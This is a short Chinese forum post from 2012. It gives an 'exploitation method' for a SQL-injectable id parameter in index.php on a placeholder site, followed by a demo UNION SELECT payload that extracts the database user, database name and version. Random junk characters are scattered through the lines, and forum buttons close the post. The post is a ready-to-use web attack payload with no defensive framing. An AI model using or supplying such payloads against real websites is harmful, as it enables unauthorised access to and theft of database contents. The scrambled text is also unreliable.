利用方法:
3 R' T( i( M1 O' X% J6 E http://www.xxx.com/index.php?id=[SQL]5 D+ h! M* k3 A4 _3 J
Demo:
' z$ l/ D V" L# D, ` }/ d8 o http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |
发表于 2012-9-10 20:47:28
收藏
支持
反对